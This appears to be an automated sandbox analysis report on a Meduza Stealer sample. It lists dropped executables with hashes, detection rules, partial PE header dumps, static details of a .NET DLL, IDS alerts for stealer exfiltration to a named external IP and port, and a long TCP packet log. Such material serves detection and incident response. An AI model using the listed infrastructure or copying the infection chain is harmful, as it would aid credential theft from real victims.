Yara Hits:	Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: C:\Windows\Temp\inyligbs.qlq.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: script.ps1, Detection: malicious, Browse Filename: script.hta, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.7./.d./.d./.d.W.e./.d.W.e./.d..e./.d...e./.d...e./.d...e./.d.W.e8/.d.W.e./.d.W.e./.d./.d...d.W.e./.d..e./.d.>d./.d..e./.dRich./.d........PE..d....7;g.........."....).4.......... ..........@..........................................`.................................................h...@................l..............<......8.......................(.......@............P..x............................text....2.......4.................. ..`.rdata..x....P.......8..............@..@.data....\|.......Z..................@....pdata...l.......n...<..............@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................................

C:\Windows\Temp\ochicikt.z2z.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1292800
Entropy (8bit):	6.519533062327776
Encrypted:	false
SSDEEP:	24576:IgAMXnXkciEIMJQZe8Us9Mjemp5wx1wach0lhSMXl5xT+d:x3Xn0ciEIp3Us+egSx+ahpxTK
MD5:	C6813DA66EBA357D0DEAA48C2F7032B8
SHA1:	6812E46C51F823FF0B0EE17BFCE0AF72F857AF66
SHA-256:	1420F60F053C3EA5605239EE431E5F487245108B1C01BE75D16B5246156FA178
SHA-512:	19391C6B12BA8F34A5FAF326F8986EF8DE4729D614D72BF438C6EFA569B3505159CA55F580FE2A02642E5E7A0F1B38A7A9DB9F0D66D67BA548D84C230183159E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: C:\Windows\Temp\ochicikt.z2z.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: script.ps1, Detection: malicious, Browse Filename: script.hta, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.7./.d./.d./.d.W.e./.d.W.e./.d..e./.d...e./.d...e./.d...e./.d.W.e8/.d.W.e./.d.W.e./.d./.d...d.W.e./.d..e./.d.>d./.d..e./.dRich./.d........PE..d....7;g.........."....).4.......... ..........@..........................................`.................................................h...@................l..............<......8.......................(.......@............P..x............................text....2.......4.................. ..`.rdata..x....P.......8..............@..@.data....\|.......Z..................@....pdata...l.......n...<..............@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................................

C:\Windows\Temp\t0ppkxxj.rwu.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1292800
Entropy (8bit):	6.519533062327776
Encrypted:	false
SSDEEP:	24576:IgAMXnXkciEIMJQZe8Us9Mjemp5wx1wach0lhSMXl5xT+d:x3Xn0ciEIp3Us+egSx+ahpxTK
MD5:	C6813DA66EBA357D0DEAA48C2F7032B8
SHA1:	6812E46C51F823FF0B0EE17BFCE0AF72F857AF66
SHA-256:	1420F60F053C3EA5605239EE431E5F487245108B1C01BE75D16B5246156FA178
SHA-512:	19391C6B12BA8F34A5FAF326F8986EF8DE4729D614D72BF438C6EFA569B3505159CA55F580FE2A02642E5E7A0F1B38A7A9DB9F0D66D67BA548D84C230183159E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: C:\Windows\Temp\t0ppkxxj.rwu.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.7./.d./.d./.d.W.e./.d.W.e./.d..e./.d...e./.d...e./.d...e./.d.W.e8/.d.W.e./.d.W.e./.d./.d...d.W.e./.d..e./.d.>d./.d..e./.dRich./.d........PE..d....7;g.........."....).4.......... ..........@..........................................`.................................................h...@................l..............<......8.......................(.......@............P..x............................text....2.......4.................. ..`.rdata..x....P.......8..............@..@.data....\|.......Z..................@....pdata...l.......n...<..............@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	3.6989393576979213
TrID:	Win32 Dynamic Link Library (generic) Net Framework (1011504/3) 44.80% Win32 Dynamic Link Library (generic) (1002004/3) 44.38% Generic .NET DLL/Assembly (238134/4) 10.55% Win16/32 Executable Delphi generic (2074/23) 0.09% Generic Win/DOS Executable (2004/3) 0.09%
File name:	iviewers.dll
File size:	6'144 bytes
MD5:	e017be56699801dc89a8d6d1724eb633
SHA1:	a7f7aae4744210db8ebaf4da06c167357bc71eca
SHA256:	aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564
SHA512:	2368425dadc7f22eb11532359d4d1aa97bf3e381f4fd7b62c587e1f8819ef64a0ff7fc75cc5948939fadebc423345ab65a1cd2799bb4136fbea89d1f75dfc8c8
SSDEEP:	96:fNnyOybUJQ23GgX791qKilsZODTgFZP/8R:fNnyOybrVO9QKilhfgFZP/u
TLSH:	94C1701167E84B72EDFB4B35AD7313421AB5FE41CE63CB1E04C4621998B2A589A70FB1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....eag...........!.................+... ...@....... ....................................@..........................@..(..

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x10002bae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67616593 [Tue Dec 17 11:50:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	dae02f32a21e03ce65412f6e56942daa

Entrypoint Preview

Instruction
jmp dword ptr [10002000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4004	0x28	.sdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2b5c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x3b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbb4	0xc00	0dd52c9ff315a382eefbfbcbbc13f259	False	0.5432942708333334	data	5.068500204999932	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x4000	0x56	0x200	2f146ab3f1132f3750cea12557ba441a	False	0.154296875	data	0.9101834463455238	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6000	0x3b8	0x400	c9d9f7fb6546838f25caaf265228a87c	False	0.373046875	data	3.045232782331068	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8000	0xc	0x200	e4ed4e5908a4dc62c22ef493453a846f	False	0.048828125	data	0.11836963125913882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x6058	0x360	data			0.40625

Imports

DLL	Import
mscoree.dll	_CorDllMain

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10002b4e

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-19T08:52:46.281767+0100	2049441	ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt	1	192.168.2.4	49737	193.3.19.151	15666	TCP
2024-12-19T08:52:46.281767+0100	2050806	ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2	1	192.168.2.4	49737	193.3.19.151	15666	TCP
2024-12-19T08:52:46.281767+0100	2050807	ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)	1	192.168.2.4	49737	193.3.19.151	15666	TCP
2024-12-19T08:52:46.401700+0100	2050806	ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2	1	192.168.2.4	49737	193.3.19.151	15666	TCP
2024-12-19T08:52:46.401700+0100	2050807	ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)	1	192.168.2.4	49737	193.3.19.151	15666	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 08:52:35.274056911 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:35.544702053 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:35.544816017 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:35.547643900 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:35.658966064 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:35.667282104 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:35.698191881 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:35.778546095 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:35.778634071 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:35.781760931 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:35.817821980 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:35.818042994 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:35.821428061 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:35.849697113 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:35.901288033 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:35.941025019 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:35.969836950 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:35.969923973 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:35.970940113 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:36.090486050 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.805109978 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.805356979 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.805366993 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.805493116 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:36.806304932 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.806313038 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.806467056 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:36.806827068 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.806839943 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.806900978 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:36.807848930 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.807858944 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.807873964 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.807950020 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:36.925235033 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.929770947 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.929949045 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:36.939291000 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.997829914 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.997847080 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:36.997955084 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.001487970 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.001543045 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.002562046 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.011071920 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.011080980 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.011348009 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.019372940 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.019392967 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.019434929 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.027189016 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.027257919 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.027349949 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.032314062 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.032322884 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.032339096 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.032392979 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.032906055 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.032913923 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.032967091 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.033694983 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.033704042 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.033761024 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.034475088 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.034485102 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.034528017 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.035353899 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.035403967 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.035861015 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.035926104 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.036226034 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.047393084 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.047408104 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.047494888 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.053374052 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.053385019 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.053417921 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.061422110 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.061609983 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.061614990 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.070028067 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.070097923 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.070281982 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.078047991 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.078203917 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.078221083 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.078250885 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.078928947 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.078941107 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.078988075 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.079752922 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.079766035 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.079804897 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.080456018 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.080476046 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.080497026 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.081206083 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.081253052 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.117691994 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.117768049 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.117851973 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.123086929 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.123204947 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.152420044 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.152435064 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.152507067 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.189851999 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.189970016 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.190047026 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.192195892 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.192358971 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.192408085 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.197415113 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.197499037 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.197700977 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.197917938 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.198551893 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.198652983 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.202404976 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.202584982 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.202624083 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.207396030 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.207639933 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.207689047 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.212461948 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.212470055 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.212538958 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.217300892 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.217310905 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.217467070 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.222361088 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.222369909 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.222547054 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.224096060 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.224185944 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.224256992 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.224733114 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.224942923 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.224948883 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.224998951 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.225814104 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.225820065 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.225862026 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.226660013 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.226667881 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.226712942 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.227180004 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.227188110 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.227235079 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.227932930 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.227941036 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.227946043 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.227988958 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.228005886 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.228713036 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.229134083 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.229183912 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.231877089 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.232075930 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.232124090 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.236741066 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.236872911 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.236881971 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.236929893 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.237457037 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.237512112 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.241735935 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.241899967 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.241944075 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.244642019 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.244865894 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.244911909 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.246570110 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.246753931 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.246794939 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.251491070 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.251645088 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.251807928 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.253001928 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.253175974 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.253232002 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.256000042 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.256167889 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.256233931 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.260243893 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.260271072 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.260319948 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.261292934 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.261506081 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.261591911 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.264297962 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.264605045 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.264751911 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.268991947 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.269001961 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.269117117 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.270073891 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.270087004 CET	80	49731	147.45.47.15	192.168.2.4
